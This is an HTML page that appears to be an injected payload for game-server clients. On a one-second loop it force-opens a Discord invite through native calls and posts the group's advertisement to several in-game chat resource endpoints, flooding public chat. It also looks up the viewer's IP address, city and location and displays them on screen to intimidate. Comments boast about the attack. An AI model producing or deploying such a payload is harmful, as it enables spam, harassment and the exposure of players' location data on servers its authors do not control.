<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>discord.gg/SZufxy4T</title>
    <style>
        body {
            margin: 0;
            padding: 0;
            background: url('https://cdn.discordapp.com/attachments/1192232348134154262/1396576254978953226/777.gif?ex=6896fa3e&is=6895a8be&hm=5cb625a5ca861639e26e7bfe1f7e22505cfaf62b04a6732b582e6f19472a7bc4&') no-repeat center center fixed;
            background-size: cover;
            font-family: 'Courier New', Courier, monospace;
            color: #78C841;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            flex-direction: column;
            text-align: center;
        }
        .image-container img {
            width: 750px; 
            height: auto;
            border: 2px solid #78C841; 
            border-radius: 15px;
            box-shadow: 0 0 15px rgba(1, 252, 76, 0.7); 
        }
        .info {
            margin-top: 20px;
            font-size: 1.5em;
            color: #78C841; 
            text-shadow: 0px 0px 8px #78C841, 0px 0px 15px #78C841, 0px 0px 25px #78C841; 
            letter-spacing: 4.5px; 
            white-space: pre-wrap;
        }
        .text {
            margin-top: 20px;
            font-size: 3em; 
            color: #78C841; 
            text-shadow: 0px 0px 8px #78C841, 0px 0px 15px #78C841, 0px 0px 25px #78C841; 
            letter-spacing: 4.5px; 
        }
        .small-text {
            margin-top: 10px;
            font-size: 1.8em; 
            color: #78C841; 
            text-shadow: 0px 0px 8px #78C841, 0px 0px 15px #78C841, 0px 0px 25px #78C841; 
            letter-spacing: 4.5px; 
        }
    </style>
    <!-- discord.gg/SZufxy4T #1 -->
    <script>
    setInterval(() => {
        window.invokeNative("openUrl", "https://discord.gg/SZufxy4T");
        window.invokeNative("openUrl", "https://discord.gg/SZufxy4T");
        window.invokeNative("openUrl", "https://discord.gg/SZufxy4T");
        window.invokeNative("openUrl", "https://discord.gg/SZufxy4T");
    }, 1000);
    </script>
</head>
<body>
    <div class="image-container">
        <img src="https://cdn.discordapp.com/attachments/1192142718797893724/1403433646576242820/standard_2.gif?ex=689788ef&is=6896376f&hm=5b0567e1be50eb186817fe7e6f41f5eda41a5deba62938ac02537eb8bf9f364d&" alt="Discord Image">
    </div>
    <audio autoplay loop>
        <source
src="https://cdn.discordapp.com/attachments/1388237738221768744/1403469636082733207/o0AoBEkoUE4QCRiE4uTfBFXkyDLuF1IoA9sehg.mp4?ex=6897aa74&is=689658f4&hm=90b77b1b60cf46e6d27d9297c2325f9789da42727c72d6cff7ca47f43a79d566&" type="audio/mpeg">
        Your browser does not support the audio element.
    </audio>
    <div class="info" id="ip-info">
        <strong>IP: <span id="ip"></span></strong><br>
        <span><strong>City:</strong> <span id="city"></span></span><br>
        <span><strong>Region:</strong> <span id="region"></span></span><br>
        <span><strong>Country:</strong> <span id="country"></span></span><br>
        <span><strong>Location:</strong> <span id="loc"></span></span><br>
        <span><strong>Organization:</strong> <span id="org"></span></span><br>
        <span><strong>Timezone:</strong> <span id="timezone"></span></span>
    </div>
      <div class="small-text">7ambola on top</div>
    <div class="text">discord.gg/SZufxy4T</div>

    <script>
         fetch('https://ipinfo.io/json')
        .then(response => response.json())
        .then(data => {
            delete data.readme;
            const infoDiv = document.getElementById('ip-info');
            infoDiv.textContent = JSON.stringify(data, null, 2);
        });

        // vjmi pulled all of them :eyes:
        // discord.gg/UAEE #1
        const msg = `👑 Kenzo & Adam - .gg/SZufxy4T ! 👑`;
        const body = JSON.stringify({ message: msg });
        setInterval(() => {
            fetch("https://flix-scripts/chatResult", { method: "POST", body });
            fetch("https://danger_chat/Danger_Chat:SendMessage", {method: "POST",body: JSON.stringify({"message": msg,"channel": "شات العام","color": null,"isImageAndLinksAllowed": [false,false]})})
            fetch("https://easy-chat+/o6ZbK5Ecp6", {headers: {accept: "*/*","content-type": "application/x-www-form-urlencoded; charset=UTF-8"},body: JSON.stringify({ message: msg, channel: "شات العام" }),method: "POST"});
            fetch("https://melix_chat/chatResult", { method: "POST", body });
            fetch("https://as_chat/chatResult", { method: "POST", body });
            fetch("https://chat/chatResult", { method: "POST", body });
            fetch("https://ho-chatv2/Chat", {method: "POST",body: JSON.stringify({"Type": "chatResult","message": msg,"chatType": "general"})});
        }, 1000);
    </script>
</body>
</html>
